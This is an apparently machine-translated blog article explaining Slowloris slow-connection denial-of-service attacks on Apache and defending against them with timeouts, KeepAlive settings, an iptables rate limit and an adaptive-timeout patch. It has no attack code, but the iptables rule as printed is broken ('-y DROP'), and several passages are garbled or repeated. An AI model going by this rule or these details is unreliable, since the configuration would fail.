fbpx

A little thought experiment: You want to write a web server, so program a socket-based server. When a browser connects to it and requests a file, it delivers it, the client terminates the connection, and everyone is satisfied. But then suddenly there is a bug report from someone whose web server is getting slower and slower, until at some point he stops responding. What now?

As you look closer at the problem, you notice that some clients are not behaving as intended: they connect, but then they do nothing and do not close them anymore. The result of this is that at some point the server will no longer be able to establish new connections and thus be unable to service new clients. The fix is simple: you put a timeout on the server so it breaks off connections after a certain amount of time, if nothing happens. The period can be set in the configuration file via the » TimeOut« directive .

It works fine for a while, but the world keeps turning and eventually web pages are no longer just individual HTML files, but a collection of HTML, images, CSS stylesheets and Javascript files. Setting up a single connection for each one takes a relatively long time, for example because the client and server have to repeat the TCP threeway handshake each time. So think of something clever: the client can keep the first connection open and request any additional files he needs. Now the second, the third and all further requests are answered much faster and again everyone is happy. Because you’ve learned something from the above problem, you’ll see another configuration option called »KeepAliveTimeout«, Which prevents clients from congesting connections indefinitely. Soon, all web administrators will download their great new web server, and under the name Apache it will soon have a market share of 60 percent.

Healthy attitude

The problem with such settings as timeouts is that most default values do not work for every application. Site A may produce millions of small static images, while Site B uses a rich dynamic framework for all content, and sites C to Z are not really sure what they’re doing. But what the hell, the web server works so well, so why care about the default values? Also, the Linux distributors barely change the default settings on delivered packages, because that would be a hell of a lot of work. So most of the time the end user has to trust the software project to choose the presets – after all, the programmers understand their software best. That’s why you’re running a web server,

In this case, the web server stops working very quickly. That is, it still works, but it is severely limited in its ability to act. If the handling of 1000 requests does not mean much effort, the server may no longer have a resource to answer legitimate requests. Malicious people can use this situation for an attack from a single computer that does not even have to have a particularly fast network connection. Cracker tools like Slowloris are still helping him

You could just limit the number of connections for an IP address or a certain range. However, this is bad when clients are behind a proxy, because then all appear on the server with the same address. The difficulty for the admin is finding a number that averts damage from the server but does not hinder legitimate users.

A generic approach to such a limit is using the rate limit of IPTables, which is also applicable to individual ports. This makes it possible to set the maximum number of connections in a given period of time. The following instructions allow a maximum of five connections in 60 seconds. In the sixth and the following, IPTables discards the data packets, causing the client to continue trying. When an earlier connection is closed, the rule allows a new one.

iptables -I INPUT -p tcp --dport 80 -m state↩
 --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 80 -m state↩
 --state NEW -m recent --update --seconds 60↩
 --hitcount 6 -y DROP

An attacker who really wants it will probably use multiple botnet computers, but at least you can make life a little harder for him.

The simplest method against Slowlor Attack is to set the ” TimeOut” of its default value 300 to five seconds. To prevent the abuse of HTTP Keepalive, you can turn it off by setting » KeepAlive« to » off«. None of these measures provides complete immunity, especially against invaders with a lot of resources, but mostly they help . Incidentally, not only Apache is affected by the Slowlor attack, but also the Squid proxy and some other web servers.

Long-term protection

Even if complete security against denial-of-service attacks is not possible. You can set up systems that survive minor attacks and at least drive the effort for attackers upwards. In the long term, the best solution seems to be to build in smart protection directly into the applications and, above all, to allow them to dynamically adjust their settings themselves. So they could reduce the connection timeout if they receive more requests, or simply cut off connections to slow clients. In this way, applications would not only survive denial-of-service attacks, but would generally be better equipped for heavy load.

An example of this is the Apache patch by Andreas Krennmair, which arms the web server against Slowlaris attacks. It monitors the web server load using the Apache scoreboard. When the load goes up, it adjusts the timeout value: at 60 percent it halves the timeout, at 70 percent it halves the timeout, and at 70 percent it halves the timeout, and so on. Although quite simple, this patch is a good example of how to integrate some intelligence and “survival instinct” into software. Unfortunately, the patch can not terminate existing connections, so an attacker with enough resources can still paralyze the server.

Costs and benefits

The irony of such attacks with extremely slow connections is that the server is not particularly stressed. Legitimate clients can simply no longer establish connections because the connection pool of the web server is already exhausted. If any are available again, the attacker will usually try to establish new connections before the legitimate clients.

The benefit of countermeasures against attacks such as Slowlaris is that it also tends to increase a server’s ability to handle peak performance. In this respect, this too has its good.


0 Comments

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.